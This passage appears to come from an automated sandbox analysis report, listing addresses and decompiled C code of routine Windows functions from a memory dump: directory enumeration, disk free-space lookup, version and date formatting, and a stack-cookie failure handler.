                                0x4a56fc78
                                0x4a56fc7d
                                0x4a56fc7d
                                0x4a56fc7f
                                0x00000000
                                0x4a56fc7f
                                0x4a56fafd
                                0x4a56fb02
                                0x4a56fb04
                                0x4a56fb0a
                                0x4a56fb0a
                                0x4a56fba9
                                0x4a56fba9
                                0x4a56fbb0
                                0x00000000
                                0x00000000
                                0x4a56fb1f
                                0x4a56fb20
                                0x4a56fb2c
                                0x4a56fb2d
                                0x4a56fb3b
                                0x4a56fb40
                                0x4a56fb42
                                0x00000000
                                0x00000000
                                0x4a56fb5e
                                0x4a56fb63
                                0x4a56fb6a
                                0x00000000
                                0x00000000
                                0x4a56fb72
                                0x4a56fb77
                                0x4a56fb79
                                0x00000000
                                0x00000000
                                0x4a56fb9b
                                0x4a56fba0
                                0x4a56fba3
                                0x4a56fc89
                                0x4a56fc8f
                                0x4a56fc9a
                                0x00000000
                                0x4a56fc9a
                                0x4a56fba3
                                0x4a56fbb6
                                0x4a56fbbe
                                0x4a56fbc3
                                0x4a56fbc3
                                0x00000000
                                0x4a56fbc3
                                0x4a56fad9
                                0x4a56fadf
                                0x00000000
                                0x4a56fadf
                                0x4a56fab6
                                0x4a56fbde
                                0x4a56fbe3
                                0x00000000
                                0x4a56fbe3
                                0x4a56f9c5
                                0x4a56f9ca
                                0x4a56f9d0
                                0x4a56fa0f
                                0x4a56fa15
                                0x4a56fa16
                                0x4a56fa22
                                0x4a56fa23
                                0x4a56fa36
                                0x4a56fa3c
                                0x4a56fa3c
                                0x4a56fa42
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56fa42
                                0x4a56f9d8
                                0x4a56f9dd
                                0x4a56f9df
                                0x00000000
                                0x00000000
                                0x4a56fa01
                                0x4a56fa06
                                0x4a56fa09
                                0x4a56f97d
                                0x4a56f983
                                0x4a56f989
                                0x4a56f994
                                0x00000000
                                0x4a56f994
                                0x00000000
                                0x4a56fa09
                                0x4a56f905
                                0x4a56f90b
                                0x00000000
                                0x00000000
                                0x4a56f92b
                                0x4a56f930
                                0x4a56f936
                                0x00000000
                                0x00000000
                                0x4a56f942
                                0x4a56f947
                                0x4a56f949
                                0x00000000
                                0x00000000
                                0x4a56f96f
                                0x4a56f974
                                0x4a56f977
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56f977
                                0x4a56f8b8
                                0x4a56f8bd
                                0x4a56f8c3
                                0x4a56f8c6
                                0x00000000
                                0x00000000
                                0x4a56f8cd
                                0x4a56f8d3
                                0x4a56f8d5
                                0x00000000
                                0x4a56f8d5
                                0x4a56f89a
                                0x4a56f829
                                0x00000000
                                0x4a56f829
                                0x4a56fc29
                                0x00000000
                                0x4a56fc29
                                0x4a56f737
                                0x4a56f73c
                                0x4a56f742
                                0x4a56f744
                                0x00000000
                                0x4a56f746
                                0x4a56f746
                                0x4a56f74c
                                0x4a56f752
                                0x4a56f754
                                0x4a56f754
                                0x00000000
                                0x4a56f752
                                0x4a56f744
                                0x4a56f717
                                0x4a56f719
                                0x00000000

                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: %s
                                • API String ID: 4275171209-3043279178
                                • Opcode ID: 2ab3416a4e7505ff4b2221bbea0a7de3128175fa704d052833f2a5156a69ab60
                                • Instruction ID: c1d17bc2d5b2b15e6bd17957bb3907a2b5192068d1bf8f7f144b8ee41e79864c
                                • Opcode Fuzzy Hash: 2ab3416a4e7505ff4b2221bbea0a7de3128175fa704d052833f2a5156a69ab60
                                • Instruction Fuzzy Hash: 9CE15671D01519AAEF219F60CE40EDD7B7AFF88314F0045D6E50DE60A6DB329AA8CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5513A9, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                Download Yara Rule
                                C-Code - Quality: 92%
                                			E4A5513A9(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr* _t26;
				void* _t29;

				_t29 = __ecx -  *0x4a5740ac; // 0xbb40e64e
				if(_t29 != 0) {
					 *0x4a574388 = __eax;
					 *0x4a574384 = __ecx;
					 *0x4a574380 = __edx;
					 *0x4a57437c = __ebx;
					 *0x4a574378 = __esi;
					 *0x4a574374 = __edi;
					 *0x4a5743a0 = ss;
					 *0x4a574394 = cs;
					 *0x4a574370 = ds;
					 *0x4a57436c = es;
					 *0x4a574368 = fs;
					 *0x4a574364 = gs;
					asm("pushfd");
					_pop( *0x4a574398);
					 *0x4a57438c =  *_t26;
					 *0x4a574390 = _v0;
					 *0x4a57439c =  &_a4;
					 *0x4a5742d8 = 0x10001;
					_t11 =  *0x4a574390; // 0x0
					 *0x4a574294 = _t11;
					 *0x4a574288 = 0xc0000409;
					 *0x4a57428c = 1;
					_t12 =  *0x4a5740ac; // 0xbb40e64e
					_v812 = _t12;
					_t13 =  *0x4a5740b0; // 0x44bf19b1
					_v808 = _t13;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(E4A5723F8);
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}












                                0x4a5513a9
                                0x4a5513af
                                0x4a572325
                                0x4a57232a
                                0x4a572330
                                0x4a572336
                                0x4a57233c
                                0x4a572342
                                0x4a572348
                                0x4a57234e
                                0x4a572354
                                0x4a57235a
                                0x4a572360
                                0x4a572366
                                0x4a57236c
                                0x4a57236d
                                0x4a572376
                                0x4a57237e
                                0x4a572386
                                0x4a572391
                                0x4a57239b
                                0x4a5723a0
                                0x4a5723a5
                                0x4a5723af
                                0x4a5723b9
                                0x4a5723be
                                0x4a5723c4
                                0x4a5723c9
                                0x4a5723d1
                                0x4a5723dc
                                0x4a5723f5
                                0x4a5513b5
                                0x4a5513b5
                                0x4a5513b5

                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 4A5723D1
                                • UnhandledExceptionFilter.KERNEL32(4A5723F8), ref: 4A5723DC
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 4A5723E7
                                • TerminateProcess.KERNEL32(00000000), ref: 4A5723EE
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                • String ID:
                                • API String ID: 3231755760-0
                                • Opcode ID: ff323346991ef76bfd6348c8370ab6eb2c300d8e9f0eda9f61f4eb52d7ec442e
                                • Instruction ID: 9b148f57c7d9fb1f1bb3abbe223b518bd14514d0ed35aa3c192cd0ced9ab8a1b
                                • Opcode Fuzzy Hash: ff323346991ef76bfd6348c8370ab6eb2c300d8e9f0eda9f61f4eb52d7ec442e
                                • Instruction Fuzzy Hash: 8B2166FC922204DFD341EFA9E6886487BBCBB4A708F41405BE50CEBA20EB705D818F15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56BF0C, Relevance: 4.8, APIs: 3, Instructions: 253fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 94%
                                			E4A56BF0C(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, short* _a20) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				WCHAR* _v604;
				void* _v608;
				intOrPtr _v612;
				short* _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				intOrPtr* _t62;
				signed int _t65;
				intOrPtr _t66;
				intOrPtr* _t76;
				void* _t87;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t98;
				WCHAR* _t108;
				short* _t114;
				intOrPtr _t117;
				void* _t123;
				intOrPtr* _t124;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr _t132;
				signed int _t133;
				intOrPtr* _t137;
				void* _t138;
				intOrPtr _t140;
				intOrPtr _t141;
				signed short _t143;
				short* _t144;
				signed int _t149;

				_t60 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t60 ^ _t149;
				_t62 = _a4;
				_v620 = _a8;
				_t139 = _a20;
				_v612 = _a12;
				_v608 = _t62;
				_v616 = _t139;
				_t143 = 0;
				_t123 = _t62 + 2;
				do {
					_t137 =  *_t62;
					_t62 = _t62 + 2;
				} while (_t137 != 0);
				_t65 = _t62 - _t123 >> 1;
				_t124 = _t139;
				if( *_t139 == 0) {
					L7:
					_t66 = 0;
				} else {
					do {
						_t137 = _t124;
						do {
							_t117 =  *_t124;
							_t124 = _t124 + 2;
						} while (_t117 != 0);
						_t116 = (_t124 - _t137 >> 1) + _t65;
						_t143 = _t143 + (_t124 - _t137 >> 1) + _t65;
					} while ( *_t124 != 0);
					if(0 != _t143) {
						_t143 = _t143 + 1;
						_t69 = _t143 & 0x0000ffff;
						_v604 = _t143 & 0x0000ffff;
						_t116 = E4A551896((_t143 & 0x0000ffff) + _t69);
						if(_t116 != 0) {
							_t144 = _t116;
							if( *_t139 != 0) {
								do {
									_v624 = _v604 - (_t144 - _t116 >> 1);
									E4A55185A(_t144, _v604 - (_t144 - _t116 >> 1), _v608);
									E4A5520A9(_t144, _t144, _v624, _t139);
									_t114 = E4A55413B(_t139);
									_t139 = _t114;
									_t144 = E4A55413B(_t144);
								} while ( *_t114 != 0);
							}
							 *_t144 = 0;
							_t139 = E4A55E342(_v620, _v612, _a16, _t116, 1);
							E4A55142E(_t116);
							_t76 = _v608;
							_t128 = _t76 + 2;
							do {
								_t137 =  *_t76;
								_t76 = _t76 + 2;
							} while (_t137 != 0);
							_t116 = (_t76 - _t128 >> 1) + 2;
							_t143 = E4A551896(_t116 + _t116);
							_v604 = _t143;
							if(_t143 == 0) {
								goto L9;
							} else {
								E4A55185A(_t143, _t116, _v608);
								_t143 = E4A552ED1(_t143) + 2;
								E4A5520A9(_t143, _v604, _t116, E4A559FFC);
								_t87 = FindFirstFileW(_v604,  &_v600);
								_v608 = _t87;
								 *_t143 = 0;
								if(_t87 != 0xffffffff) {
									L16:
									while(1) {
										if((_v600.dwFileAttributes & 0x00000010) == 0) {
											L41:
											if(FindNextFileW(_v608,  &_v600) != 0) {
												continue;
											}
										} else {
											_t130 = E4A552EC4;
											_t92 =  &(_v600.cFileName);
											while(1) {
												_t137 =  *_t92;
												if(_t137 !=  *_t130) {
													break;
												}
												if(_t137 == 0) {
													L22:
													_t92 = 0;
												} else {
													_t137 =  *((intOrPtr*)(_t92 + 2));
													_t34 = _t130 + 2; // 0x5c0000
													if(_t137 !=  *_t34) {
														break;
													} else {
														_t92 = _t92 + 4;
														_t130 = _t130 + 4;
														if(_t137 != 0) {
															continue;
														} else {
															goto L22;
														}
													}
												}
												L24:
												if(_t92 == 0) {
													goto L41;
												} else {
													_t131 = E4A552EBC;
													_t93 =  &(_v600.cFileName);
													while(1) {
														_t137 =  *_t93;
														if(_t137 !=  *_t131) {
															break;
														}
														if(_t137 == 0) {
															L30:
															_t93 = 0;
														} else {
															_t137 =  *((intOrPtr*)(_t93 + 2));
															_t37 = _t131 + 2; // 0x2e
															if(_t137 !=  *_t37) {
																break;
															} else {
																_t93 = _t93 + 4;
																_t131 = _t131 + 4;
																if(_t137 != 0) {
																	continue;
																} else {
																	goto L30;
																}
															}
														}
														L32:
														if(_t93 == 0) {
															goto L41;
														} else {
															_t94 = _v604;
															_t138 = _t94 + 2;
															do {
																_t132 =  *_t94;
																_t94 = _t94 + 2;
															} while (_t132 != 0);
															_t133 = _t94 - _t138 >> 1;
															_t98 =  &(_v600.cFileName);
															_t137 = _t98 + 2;
															do {
																_t140 =  *_t98;
																_t98 = _t98 + 2;
															} while (_t140 != 0);
															_t141 = (_t98 - _t137 >> 1) + _t133 + 2;
															if(_t141 <= _t116) {
																L40:
																E4A5520A9(_t143, _v604, _t116,  &(_v600.cFileName));
																E4A5520A9(_t143, _v604, _t116, E4A552EC8);
																_t139 = E4A56BF0C(_v604, _v620, _v612, _a16, _v616);
																 *_t143 = 0;
																goto L41;
															} else {
																_t108 = E4A552536(_v604, _t141 + _t141);
																if(_t108 == 0) {
																	_t139 = 1;
																} else {
																	_v604 = _t108;
																	_t116 = _t141;
																	_t143 = E4A552ED1(_t108) + 2;
																	goto L40;
																}
															}
														}
														goto L44;
													}
													asm("sbb eax, eax");
													asm("sbb eax, 0xffffffff");
													goto L32;
												}
												goto L44;
											}
											asm("sbb eax, eax");
											asm("sbb eax, 0xffffffff");
											goto L24;
										}
										L44:
										FindClose(_v608);
										goto L45;
									}
								}
								L45:
								E4A55142E(_v604);
								_t66 = _t139;
							}
						} else {
							L9:
							_t66 = 1;
						}
					} else {
						goto L7;
					}
				}
				return E4A5513A9(_t66, _t116, _v8 ^ _t149, _t137, _t139, _t143);
			}









































                                0x4a56bf17
                                0x4a56bf1e
                                0x4a56bf24
                                0x4a56bf29
                                0x4a56bf33
                                0x4a56bf36
                                0x4a56bf3c
                                0x4a56bf42
                                0x4a56bf48
                                0x4a56bf4a
                                0x4a56bf4d
                                0x4a56bf4d
                                0x4a56bf51
                                0x4a56bf52
                                0x4a56bf59
                                0x4a56bf5b
                                0x4a56bf60
                                0x4a56bf85
                                0x4a56bf85
                                0x4a56bf62
                                0x4a56bf62
                                0x4a56bf62
                                0x4a56bf64
                                0x4a56bf64
                                0x4a56bf68
                                0x4a56bf69
                                0x4a56bf74
                                0x4a56bf76
                                0x4a56bf78
                                0x4a56bf83
                                0x4a56bf8c
                                0x4a56bf8d
                                0x4a56bf90
                                0x4a56bf9e
                                0x4a56bfa2
                                0x4a56bfb2
                                0x4a56bfb4
                                0x4a56bfb6
                                0x4a56bfcc
                                0x4a56bfd2
                                0x4a56bfdf
                                0x4a56bfe5
                                0x4a56bfeb
                                0x4a56bff6
                                0x4a56bff6
                                0x4a56bfb6
                                0x4a56c008
                                0x4a56c017
                                0x4a56c019
                                0x4a56c01e
                                0x4a56c024
                                0x4a56c027
                                0x4a56c027
                                0x4a56c02b
                                0x4a56c02c
                                0x4a56c035
                                0x4a56c041
                                0x4a56c043
                                0x4a56c04b
                                0x00000000
                                0x4a56c051
                                0x4a56c059
                                0x4a56c073
                                0x4a56c074
                                0x4a56c086
                                0x4a56c08e
                                0x4a56c094
                                0x4a56c09a
                                0x00000000
                                0x4a56c0a0
                                0x4a56c0a7
                                0x4a56c1d1
                                0x4a56c1e6
                                0x00000000
                                0x4a56c1e8
                                0x4a56c0ad
                                0x4a56c0ad
                                0x4a56c0b2
                                0x4a56c0b8
                                0x4a56c0b8
                                0x4a56c0be
                                0x00000000
                                0x00000000
                                0x4a56c0c3
                                0x4a56c0da
                                0x4a56c0da
                                0x4a56c0c5
                                0x4a56c0c5
                                0x4a56c0c9
                                0x4a56c0cd
                                0x00000000
                                0x4a56c0cf
                                0x4a56c0cf
                                0x4a56c0d2
                                0x4a56c0d8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56c0d8
                                0x4a56c0cd
                                0x4a56c0e3
                                0x4a56c0e5
                                0x00000000
                                0x4a56c0eb
                                0x4a56c0eb
                                0x4a56c0f0
                                0x4a56c0f6
                                0x4a56c0f6
                                0x4a56c0fc
                                0x00000000
                                0x00000000
                                0x4a56c101
                                0x4a56c118
                                0x4a56c118
                                0x4a56c103
                                0x4a56c103
                                0x4a56c107
                                0x4a56c10b
                                0x00000000
                                0x4a56c10d
                                0x4a56c10d
                                0x4a56c110
                                0x4a56c116
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56c116
                                0x4a56c10b
                                0x4a56c121
                                0x4a56c123
                                0x00000000
                                0x4a56c129
                                0x4a56c129
                                0x4a56c12f
                                0x4a56c132
                                0x4a56c132
                                0x4a56c136
                                0x4a56c137
                                0x4a56c140
                                0x4a56c142
                                0x4a56c148
                                0x4a56c14b
                                0x4a56c14b
                                0x4a56c14f
                                0x4a56c150
                                0x4a56c159
                                0x4a56c15f
                                0x4a56c186
                                0x4a56c194
                                0x4a56c1a5
                                0x4a56c1ca
                                0x4a56c1ce
                                0x00000000
                                0x4a56c161
                                0x4a56c16b
                                0x4a56c172
                                0x4a56c1ef
                                0x4a56c174
                                0x4a56c175
                                0x4a56c17b
                                0x4a56c185
                                0x00000000
                                0x4a56c185
                                0x4a56c172
                                0x4a56c15f
                                0x00000000
                                0x4a56c123
                                0x4a56c11c
                                0x4a56c11e
                                0x00000000
                                0x4a56c11e
                                0x00000000
                                0x4a56c0e5
                                0x4a56c0de
                                0x4a56c0e0
                                0x00000000
                                0x4a56c0e0
                                0x4a56c1f0
                                0x4a56c1f6
                                0x00000000
                                0x4a56c1f6
                                0x4a56c0a0
                                0x4a56c1fc
                                0x4a56c202
                                0x4a56c207
                                0x4a56c207
                                0x4a56bfa4
                                0x4a56bfa4
                                0x4a56bfa6
                                0x4a56bfa6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56bf83
                                0x4a56c217

                                APIs
                                  • Part of subcall function 4A551896: GetProcessHeap.KERNEL32(00000008,4A5525C0,4A5525BB,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C), ref: 4A5518A9
                                  • Part of subcall function 4A551896: HeapAlloc.KERNEL32(00000000,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C,?,4A556CE6), ref: 4A5518B0
                                • FindFirstFileW.KERNEL32(?,?,?,?,Function_00009FFC,00000000,00000000,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 4A56C086
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocFileFindFirstProcess
                                • String ID:
                                • API String ID: 2094127529-0
                                • Opcode ID: f530575e577914e593745fe168a3587c59eb8821fdacdbb4caaea041f95d7b6b
                                • Instruction ID: 29ceeec259c60ef5af3e11cb5a530c8b6c331077853e5d1a3a966c34964585ff
                                • Opcode Fuzzy Hash: f530575e577914e593745fe168a3587c59eb8821fdacdbb4caaea041f95d7b6b
                                • Instruction Fuzzy Hash: CA810B3190111BAFDB15AF74CE44AAEBBB5EF94354F0101A5E849EB168EB71DE81CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A563185, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A563185(intOrPtr __ebx, void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				short _v532;
				signed int _v536;
				union _ULARGE_INTEGER _v540;
				union _ULARGE_INTEGER _v548;
				union _ULARGE_INTEGER _v556;
				void* __edi;
				void* __esi;
				signed int _t21;
				intOrPtr _t43;
				void* _t44;
				intOrPtr _t47;
				signed int _t51;

				_t47 = __edx;
				_t44 = __ecx;
				_t43 = __ebx;
				_t21 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t21 ^ _t51;
				_t48 = _a4;
				E4A55AA4F(_a4);
				E4A55185A( &_v532, 0x106, _a8);
				if(E4A562620( &_v532) != 0) {
					E4A5520A9(0x106,  &_v532, 0x106, E4A552EC8);
				}
				_v536 = _v536 & 0x00000000;
				_v540.LowPart = _v540.LowPart & 0x00000000;
				GetDiskFreeSpaceExW( &_v532,  &_v540,  &_v556,  &_v548);
				E4A562CB6(_t44, _t48, 6);
				E4A56292F(_a12,  &_v540, 0xe,  &_v532, 0x106);
				return E4A5513A9(E4A56301F(_t47, _t48, 0x2379, 2, E4A559A2C(L"%5lu", _a16)), _t43, _v8 ^ _t51, _t47, _t48, 0x106,  &_v532);
			}
















                                0x4a563185
                                0x4a563185
                                0x4a563185
                                0x4a563190
                                0x4a563197
                                0x4a56319f
                                0x4a5631a3
                                0x4a5631b6
                                0x4a5631c9
                                0x4a56ac03
                                0x4a56ac03
                                0x4a5631cf
                                0x4a5631d6
                                0x4a5631f9
                                0x4a563202
                                0x4a56321b
                                0x4a563252

                                APIs
                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?,?,?,00000106,?,?,00000106,?), ref: 4A5631F9
                                  • Part of subcall function 4A56292F: wcsncmp.MSVCRT(?,4A574920,?,?,?,?), ref: 4A5629ED
                                  • Part of subcall function 4A56301F: FormatMessageW.KERNEL32(00001900,00000000,00000000,00000000,?,0000000A,?,?,?,?), ref: 4A56305C
                                  • Part of subcall function 4A56301F: LocalFree.KERNEL32(?,?,?), ref: 4A563088
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Free$DiskFormatLocalMessageSpacewcsncmp
                                • String ID: %5lu
                                • API String ID: 482386376-2100233843
                                • Opcode ID: d1deaf9fbb369c114d82513c9cbd2cf44eb9fb8edab9d372e77813c44ec2e98e
                                • Instruction ID: b902d33bd44b8ba7708ec8caad38d8afc623a32f8175af22435e50ab3bf6af71
                                • Opcode Fuzzy Hash: d1deaf9fbb369c114d82513c9cbd2cf44eb9fb8edab9d372e77813c44ec2e98e
                                • Instruction Fuzzy Hash: AF21927290111CBADB21DA90DE88FEF77BCAF94310F000496F609EA045DA749B848BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55D3B3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E4A55D3B3(intOrPtr _a4, intOrPtr _a8) {
				signed char _t3;

				_t3 = GetVersion();
				_push(_t3 >> 0x00000010 & 0x00003fff);
				_push(_t3 >> 0x00000008 & 0x000000ff);
				return E4A55179D(_a4, _a8, L"%d.%d.%04d", _t3 & 0x000000ff);
			}




                                0x4a55d3b8
                                0x4a55d3c9
                                0x4a55d3d5
                                0x4a55d3ee

                                APIs
                                • GetVersion.KERNEL32(?,4A55C88C,?,00000020), ref: 4A55D3B8
                                  • Part of subcall function 4A55179D: _vsnwprintf.MSVCRT ref: 4A5517CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Version_vsnwprintf
                                • String ID: %d.%d.%04d
                                • API String ID: 2848646618-2515412502
                                • Opcode ID: 417f71d425164a8591ace5a0a3e28da2d5f56570886593154e613ec3e1c22e1a
                                • Instruction ID: f1694589db1edb2a5ad2b90b4ba13eaea359d94f1318f4c3303314aba108fb76
                                • Opcode Fuzzy Hash: 417f71d425164a8591ace5a0a3e28da2d5f56570886593154e613ec3e1c22e1a
                                • Instruction Fuzzy Hash: 19D02BB341000B3BD7083614DC15D393A9DE7D0300B400039FD0B8518ADE384A2092A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A564E44, Relevance: 3.0, APIs: 2, Instructions: 11timeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E4A564E44(intOrPtr* __eax, void* __ecx) {
				long _t67;
				signed int _t69;
				short* _t72;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t86;
				void* _t87;
				void* _t95;
				intOrPtr _t96;
				void* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				intOrPtr _t111;
				int _t112;
				signed int _t113;

				 *__eax =  *__eax + __eax;
				__eax = __ebp - 0x160;
				GetSystemTime(__ebp - 0x160);
				__ebp - 0x168 = __ebp - 0x160;
				__eax = SystemTimeToFileTime(__ebp - 0x160, __ebp - 0x168);
				__ebp - 0x170 = __ebp - 0x168;
				FileTimeToLocalFileTime(__ebp - 0x168, __ebp - 0x170) = __ebp - 0x160;
				__ebp - 0x170 = FileTimeToSystemTime(__ebp - 0x170, __ebp - 0x160);
				__eflags =  *0x4a574081;
				if( *0x4a574081 == 0) {
					__eflags =  *(__ebp + 0xc);
					__esi =  *(__ebp - 0x15e) & 0x0000ffff;
					__edi =  *(__ebp - 0x15a) & 0x0000ffff;
					__ebx =  *(__ebp - 0x160) & 0x0000ffff;
					if( *(__ebp + 0xc) == 0) {
						__eax = __ebx;
						__edx = 0;
						__ecx = 0x64;
						_t50 = __eax % __ecx;
						__eflags = _t50;
						__eax = __eax / __ecx;
						__edx = _t50;
						__ebx = __edx;
					}
					__eax =  *0x4a5741d0; // 0x0
					__eflags = __eax - 2;
					if(__eax != 2) {
						__eflags = __eax - 1;
						if(__eax == 1) {
							__eax = __esi;
							__esi = __edi;
							__edi = __eax;
						}
					} else {
						__eax = __ebx;
						__ebx = __edi;
						__edi = __esi;
						__esi = __eax;
					}
					__eflags =  *0x4a5740dc - 0x20;
					if( *0x4a5740dc >= 0x20) {
						L54:
						_push(__ebx);
						__eax = 0x4a574940;
						_push(0x4a574940);
						_push(__edi);
						_push(0x4a574940);
						__eax = E4A55179D( *0x4a5740d8,  *0x4a5740dc, L"%02d%s%02d%s%02d", __esi);
						__ebx =  *(__ebp - 0x150);
						goto L18;
					} else {
						__eax = realloc( *0x4a5740d8, 0x40);
						_pop(__ecx);
						_pop(__ecx);
						__eflags = __eax;
						if(__eax == 0) {
							L44:
							_push(0);
							_push(8);
							L43:
							E4A556D44(_t99);
							_t69 = 0;
							goto L25;
						}
						 *0x4a5740d8 = __eax;
						 *0x4a5740dc = 0x20;
						goto L54;
					}
				} else {
					 *(__ebp - 0x14c) =  *(__ebp - 0x14c) & 0x00000000;
					__esi = 0x80;
					__eax = __ebp - 0x144;
					__eax = E4A55756D();
					__eax = GetLocaleInfoW(__eax, 0x1f, __ebp - 0x144, 0x80);
					__eflags = __eax;
					if(__eax == 0) {
						__ebp - 0x144 = E4A55185A(__ebp - 0x144, 0x80,  *0x4a5741cc);
					}
					__eflags =  *(__ebp - 0x144);
					__esi = __ebp - 0x144;
					if( *(__ebp - 0x144) == 0) {
						L16:
						__ebp - 0x144 = __ebp - 0x160;
						__eax = E4A55756D();
						__edi = GetDateFormatW;
						__eax = GetDateFormatW(__eax, 0, __ebp - 0x160, __ebp - 0x144,  *0x4a5740d8,  *0x4a5740dc);
						__eflags = __eax;
						if(__eax == 0) {
							goto L1;
						}
						__eflags =  *0x4a5740d8;
						if( *0x4a5740d8 == 0) {
							goto L1;
						}
						L18:
						E4A55185A(_t113 - 0x44, 0x20, E4A562B93( *(_t113 - 0x15c) & 0x0000ffff));
						__eflags = _t95;
						if(_t95 == 0) {
							__eflags =  *(_t113 - 0x148) - _t95;
							if( *(_t113 - 0x148) != _t95) {
								_t81 = E4A55661C();
								__eflags = _t81;
								_t82 = _t113 - 0x44;
								if(_t81 == 0) {
									_push( *0x4a5740d8);
									_push(_t82);
								} else {
									_push(_t82);
									_push( *0x4a5740d8);
								}
								_push(L"%s %s ");
								_t69 = E4A5558F3();
								L25:
								_pop(_t109);
								_pop(_t111);
								_pop(_t96);
								return E4A5513A9(_t69, _t96,  *(_t113 - 4) ^ _t113, _t108, _t109, _t111);
							}
							_t69 = E4A5558F3("%s ",  *0x4a5740d8);
							goto L25;
						}
						__eflags =  *(_t113 - 0x148);
						if( *(_t113 - 0x148) == 0) {
							L21:
							E4A55185A(_t95,  *((intOrPtr*)(_t113 + 0x14)),  *0x4a5740d8);
							L22:
							_t84 = _t95;
							_t108 = _t84 + 2;
							do {
								_t107 =  *_t84;
								_t84 = _t84 + 2;
								__eflags = _t107;
							} while (_t107 != 0);
							_t86 = _t84 - _t108;
							__eflags = _t86;
							_t69 = _t86 >> 1;
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t113 + 0xc)) - 1;
						if( *((intOrPtr*)(_t113 + 0xc)) == 1) {
							_t87 = E4A55661C();
							__eflags = _t87;
							if(_t87 == 0) {
								E4A55185A(_t95,  *((intOrPtr*)(_t113 + 0x14)), _t113 - 0x44);
								E4A5520A9(_t112, _t95,  *((intOrPtr*)(_t113 + 0x14)), E4A5525B8);
								_push( *0x4a5740d8);
							} else {
								E4A55185A(_t95,  *((intOrPtr*)(_t113 + 0x14)),  *0x4a5740d8);
								E4A5520A9(_t112, _t95,  *((intOrPtr*)(_t113 + 0x14)), E4A5525B8);
								_push(_t113 - 0x44);
							}
							_push( *((intOrPtr*)(_t113 + 0x14)));
							_push(_t95);
							E4A5520A9(_t112);
							goto L22;
						}
						goto L21;
					} else {
						__ebx = memmove;
						do {
							__edx =  *__esi & 0x0000ffff;
							__eflags = __dx - 0x27;
							if(__dx == 0x27) {
								__eax = 0;
								__eflags =  *(__ebp - 0x14c);
								__eax = 0 | __eflags == 0x00000000;
								 *(__ebp - 0x14c) = __eflags == 0;
								L13:
								__esi = __esi + 1;
								__esi = __esi + 1;
								__eflags = __esi;
								goto L14;
							}
							__eflags =  *(__ebp - 0x14c);
							if( *(__ebp - 0x14c) != 0) {
								goto L13;
							}
							__eflags = __dx - 0x64;
							if(__dx == 0x64) {
								L26:
								__ecx = 0;
								__eflags = 0;
								do {
									__ecx = __ecx + 1;
